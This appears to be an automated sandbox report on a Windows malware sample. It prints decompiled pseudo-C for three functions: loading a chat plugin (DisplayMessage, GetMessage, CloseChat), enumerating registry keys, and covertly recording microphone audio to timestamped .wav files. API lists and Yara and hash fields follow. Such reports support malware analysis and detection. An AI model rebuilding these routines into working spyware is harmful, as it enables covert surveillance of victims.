					_t35 = E0040180C( &_v28, __eflags, 0);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t62 = E00406DD9(_t35);
					__eflags = _t62;
					if(_t62 == 0) {
						L12:
						E004017DD( &_v28);
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						__eflags = 0;
						return 0;
					}
					 *0x41b794 = E00407033(_t62, "DisplayMessage");
					 *0x41b798 = E00407033(_t62, "GetMessage");
					_t41 = E00407033(_t62, "CloseChat");
					_t105 = _t104 + 8;
					 *0x41b79c = _t41;
					 *0x41b790 = 1;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
					E004020C2(_t95, 0x74, 0x41b738);
					L10:
					_t63 = HeapCreate(0, 0, 0);
					_t45 =  *0x41b798(_t63,  &_v12);
					__eflags = _t45;
					if(_t45 != 0) {
						_t105 = _t105 - 0x10;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z(_t45,  &_v5);
						E004020C2(_t95, 0x3b, _v12);
						HeapFree(_t63, 0, _v12);
					}
					goto L10;
				}
				_t109 = _t97 != 1;
				if(_t97 != 1) {
					goto L12;
				}
				_t50 = E00412881( &_v92);
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ( &_v92, E0040180C( &_v28, _t109, 0));
				_t51 =  *0x41b794(_t50);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_t51 == 0) {
					goto L12;
				}
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z( &_a7);
				E00412855( &_v60, _t104 - 0x10,  &_v60);
				E004020C2(_t95, 0x3b, 0x41576c);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				L4:
				while(GetMessageA( &_v120, 0, 0, 0) <= 0) {
					if(__eflags >= 0) {
						goto L12;
					}
				}
				TranslateMessage( &_v120);
				DispatchMessageA( &_v120);
				goto L4;
			}

























                                  0x0040295e
                                  0x00402967
                                  0x00402971
                                  0x0040297a
                                  0x00402983
                                  0x0040299b
                                  0x004029ab
                                  0x004029ba
                                  0x004029c4
                                  0x004029c9
                                  0x004029cc
                                  0x004029cf
                                  0x00402a80
                                  0x00402a87
                                  0x00402a93
                                  0x00402a96
                                  0x00402a98
                                  0x00402b33
                                  0x00402b36
                                  0x00402b3e
                                  0x00402b47
                                  0x00402b4f
                                  0x00402b53
                                  0x00402b53
                                  0x00402aaf
                                  0x00402abf
                                  0x00402ac4
                                  0x00402ac9
                                  0x00402acc
                                  0x00402ad3
                                  0x00402adf
                                  0x00402ae9
                                  0x00402aee
                                  0x00402af7
                                  0x00402afe
                                  0x00402b05
                                  0x00402b08
                                  0x00402b0a
                                  0x00402b17
                                  0x00402b21
                                  0x00402b2b
                                  0x00402b2b
                                  0x00000000
                                  0x00402b08
                                  0x004029d5
                                  0x004029d6
                                  0x00000000
                                  0x00000000
                                  0x004029ec
                                  0x004029f5
                                  0x004029fc
                                  0x00402a08
                                  0x00402a10
                                  0x00000000
                                  0x00000000
                                  0x00402a22
                                  0x00402a32
                                  0x00402a3d
                                  0x00402a45
                                  0x00000000
                                  0x00402a4b
                                  0x00402a72
                                  0x00000000
                                  0x00000000
                                  0x00402a78
                                  0x00402a60
                                  0x00402a6a
                                  0x00000000

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00402971
                                  • SetEvent.KERNEL32(?), ref: 0040297A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00402983
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 0040299B
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 004029AB
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004029BA
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004029F5
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00402A08
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041576C,?), ref: 00402A22
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(0000003B), ref: 00402A45
                                  • GetMessageA.USER32 ref: 00402A52
                                  • TranslateMessage.USER32(?), ref: 00402A60
                                  • DispatchMessageA.USER32 ref: 00402A6A
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00402A87
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B738,00000000,DisplayMessage), ref: 00402ADF
                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00402AF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00402B17
                                  • HeapFree.KERNEL32(00000000,00000000,?,0000003B), ref: 00402B2B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B3E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402B47
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$??0?$basic_string@$??1?$basic_string@$G@2@@std@@G@std@@$V01@@$?c_str@?$basic_string@?length@?$basic_string@$D@1@@MessageV12@$?substr@?$basic_string@G@1@@Heap$??2@??3@??4?$basic_string@?find@?$basic_string@CreateDispatchEventFreeTranslateV01@
                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                  • API String ID: 1701728818-749203953
                                  • Opcode ID: 05f6091bb8e4fb570316d0bc2ae79ecd824646f3970f9e54cc59898a20bb853e
                                  • Instruction ID: 706d1787dbe5d31282a01ee588047493408fae45c62342a208237384888500fd
                                  • Opcode Fuzzy Hash: 05f6091bb8e4fb570316d0bc2ae79ecd824646f3970f9e54cc59898a20bb853e
                                  • Instruction Fuzzy Hash: 75517F72A00608EBCB14ABE1ED4D9EE7B7CEF84355B10403AF502E31D1DBB85545CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040BE34, Relevance: 39.1, APIs: 26, Instructions: 148registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 34%
                                  			E0040BE34(char _a4, short* _a20, intOrPtr _a24, char _a27) {
				void* _v8;
				char _v24;
				char _v40;
				char _v56;
				char _v72;
				char _v88;
				char _v104;
				char _v120;
				char _v136;
				char _v152;
				void* _t28;
				long _t29;
				void* _t35;
				char* _t38;
				char* _t39;
				char* _t40;
				char* _t41;
				char* _t42;
				char* _t43;
				char* _t44;
				void* _t54;
				void* _t56;
				char* _t73;
				void* _t77;
				void* _t79;

				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				_t28 = E0040BD9B( &_a4);
				_t79 = _t77 - 0x10 + 0x10;
				_t47 = 0;
				_t29 = RegOpenKeyExW(_t28, _a20, 0, 0x20019,  &_v8);
				_t90 = _t29;
				if(_t29 != 0) {
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_a27);
					E004020C2(0x41bde0, 0x72, "3");
				} else {
					E0040BB20( &_v8, _t90, _v8);
					_pop(_t54);
					_t73 = "0";
					if(_a24 != 0) {
						_t73 = "1";
					}
					_t35 = E00412855(_t54,  &_v152, 0x41bdd0);
					_t56 = 0x41b310;
					_t38 =  &_v88;
					L00414176();
					_t39 =  &_v56;
					L00414140();
					_t40 =  &_v40;
					L00414140();
					_t41 =  &_v24;
					L00414140();
					_t42 =  &_v72;
					L00414140();
					_t43 =  &_v104;
					L00414140();
					_t44 =  &_v136;
					L00414140();
					L00414140();
					E004020C2(0x41bde0, 0x71, _t79 - 0x10);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t44, _t44, _t43, _t43, _t42, _t42, _t41, _t41, _t40, _t40, _t39, _t39, _t38, _t38, _t73, 0x41b310, E00412855(_t56,  &_v120, 0x41be40), 0x41b310, _t35, 0x41be30, 0x41b310, 0x41be50);
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(0x415800);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
					RegCloseKey(_v8);
					_t47 = 1;
				}
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t47;
			}




























                                  0x0040be49
                                  0x0040be4f
                                  0x0040be54
                                  0x0040be5a
                                  0x0040be67
                                  0x0040be6d
                                  0x0040be6f
                                  0x0040bfea
                                  0x0040bff7
                                  0x0040be75
                                  0x0040be78
                                  0x0040be80
                                  0x0040be81
                                  0x0040be86
                                  0x0040be88
                                  0x0040be88
                                  0x0040beaf
                                  0x0040beb5
                                  0x0040beca
                                  0x0040becf
                                  0x0040bed8
                                  0x0040bedc
                                  0x0040bee5
                                  0x0040bee9
                                  0x0040bef2
                                  0x0040bef6
                                  0x0040beff
                                  0x0040bf03
                                  0x0040bf0c
                                  0x0040bf10
                                  0x0040bf19
                                  0x0040bf20
                                  0x0040bf2a
                                  0x0040bf39
                                  0x0040bf44
                                  0x0040bf4d
                                  0x0040bf56
                                  0x0040bf5f
                                  0x0040bf68
                                  0x0040bf71
                                  0x0040bf7a
                                  0x0040bf83
                                  0x0040bf8f
                                  0x0040bfa0
                                  0x0040bfac
                                  0x0040bfbd
                                  0x0040bfc9
                                  0x0040bfd2
                                  0x0040bfd8
                                  0x0040bfd8
                                  0x0040bfff
                                  0x0040c00b

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,00000004), ref: 0040BE49
                                    • Part of subcall function 0040BD9B: ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,HKLM,00000004,?,0040BE54,?,?,00000004), ref: 0040BDAE
                                    • Part of subcall function 0040BD9B: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BE1E
                                  • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,00020019,0040C731), ref: 0040BE67
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,00415B14,0041B310,00000000,0041B310,00000000,0041B310,0041BE30,0041B310,0041BE50), ref: 0040BECF
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,0041BE30,0041B310,0041BE50), ref: 0040BEDC
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,0041B310,0041BE50), ref: 0040BEE9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BEF6
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,0041B310,0041BE50), ref: 0040BF03
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041B310), ref: 0040BF10
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF20
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040BF2A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000071), ref: 0040BF44
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF4D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF56
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF5F
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF68
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF71
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF7A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF83
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040BF8F
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFA0
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00415800), ref: 0040BFAC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFBD
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 0040BFC9
                                  • RegCloseKey.ADVAPI32(0040C731), ref: 0040BFD2
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415B1C,?), ref: 0040BFEA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000072), ref: 0040BFFF
                                    • Part of subcall function 0040BB20: RegQueryInfoKeyW.ADVAPI32 ref: 0040BB8F
                                    • Part of subcall function 0040BB20: RegEnumKeyExW.ADVAPI32 ref: 0040BBBE
                                    • Part of subcall function 0040BB20: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(0041623C,?), ref: 0040BBD4
                                    • Part of subcall function 0040BB20: ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,?,00000000), ref: 0040BBE6
                                    • Part of subcall function 0040BB20: ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,0040BE7D,0040C731), ref: 0040BBF4
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BBFD
                                    • Part of subcall function 0040BB20: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,0040BE7D,0040C731), ref: 0040BC06
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$V?$basic_string@$D@2@@0@Hstd@@$G@std@@V10@0@$G@2@@std@@$V01@$??4?$basic_string@$??0?$basic_string@$V01@@V10@@$??8std@@CloseD@1@@EnumG@1@@G@2@@0@InfoOpenQueryY?$basic_string@
                                  • String ID:
                                  • API String ID: 3909728815-0
                                  • Opcode ID: b1cfcf78c7c26c0e573a20c40788f4b991fe636cd3f8b8d691f423e018ab4417
                                  • Instruction ID: 9e337717dcf7d24ebdd05483ab6efa78b4c81bdad12c42f1fd6fa3557793e14f
                                  • Opcode Fuzzy Hash: b1cfcf78c7c26c0e573a20c40788f4b991fe636cd3f8b8d691f423e018ab4417
                                  • Instruction Fuzzy Hash: 7741477290020DEBCB04BBE1ED4ADDE7B7CDF94345B10403AF506A7152EB785A85CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401640, Relevance: 38.6, APIs: 20, Strings: 2, Instructions: 102stringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 20%
                                  			E00401640(void* __edx, intOrPtr _a8, char _a11) {
				char _v5;
				char _v12;
				void* _v28;
				char _v44;
				char _v60;
				char _v76;
				char _v92;
				char _v108;
				char _v188;
				int _t23;
				char* _t25;
				char* _t32;
				char* _t33;
				char* _t34;
				CHAR* _t36;
				intOrPtr _t37;
				void* _t56;

				_t23 =  &_v5;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z(_t23);
				if(_a8 == 0x3c0) {
					__imp__time( &_v12, _t56);
					_t25 =  &_v12;
					__imp__localtime(_t25);
					__imp__strftime( &_v188, 0x50, "%Y-%m-%d %H.%M", _t25);
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v188,  &_a11);
					_t32 =  &_v76;
					L00414152();
					_t33 =  &_v108;
					L0041414C();
					_t34 =  &_v60;
					L00414146();
					__imp__??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t34, _t34, _t33, _t33, _t32, _t32, 0x41b1e8, 0x5c, E00412795( &_v92,  &_v44), L".wav");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E004013BE(_t34, 0x41b1a0);
					_t36 = waveInUnprepareHeader(E0041B210, 0x41b1a0, 0x20);
					__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					0x41b1a0->lpData = _t36;
					_t37 =  *0x41b1d8; // 0x0
					 *0x41b1a4 = _t37;
					 *0x41b1a8 = 0;
					 *0x41b1ac = 0;
					 *0x41b1b0 = 0;
					 *0x41b1b4 = 0;
					waveInPrepareHeader(E0041B210, 0x41b1a0, 0x20);
					_t23 = waveInAddBuffer(E0041B210, 0x41b1a0, 0x20);
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t23;
			}




















                                  0x00401649
                                  0x00401650
                                  0x0040165d
                                  0x00401668
                                  0x0040166e
                                  0x00401672
                                  0x00401687
                                  0x0040169e
                                  0x004016bb
                                  0x004016c4
                                  0x004016cd
                                  0x004016d1
                                  0x004016da
                                  0x004016de
                                  0x004016ea
                                  0x004016f3
                                  0x004016fc
                                  0x00401705
                                  0x0040170e
                                  0x00401717
                                  0x00401726
                                  0x0040172d
                                  0x0040173d
                                  0x00401748
                                  0x0040174e
                                  0x00401753
                                  0x00401758
                                  0x0040175f
                                  0x00401764
                                  0x00401769
                                  0x0040176e
                                  0x0040177c
                                  0x0040178b
                                  0x00401791
                                  0x00401795
                                  0x0040179c

                                  APIs
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00401650
                                  • time.MSVCRT ref: 00401668
                                  • localtime.MSVCRT ref: 00401672
                                  • strftime.MSVCRT ref: 00401687
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 0040169E
                                    • Part of subcall function 00412795: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                    • Part of subcall function 00412795: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                    • Part of subcall function 00412795: ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                    • Part of subcall function 00412795: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                    • Part of subcall function 00412795: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                    • Part of subcall function 00412795: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
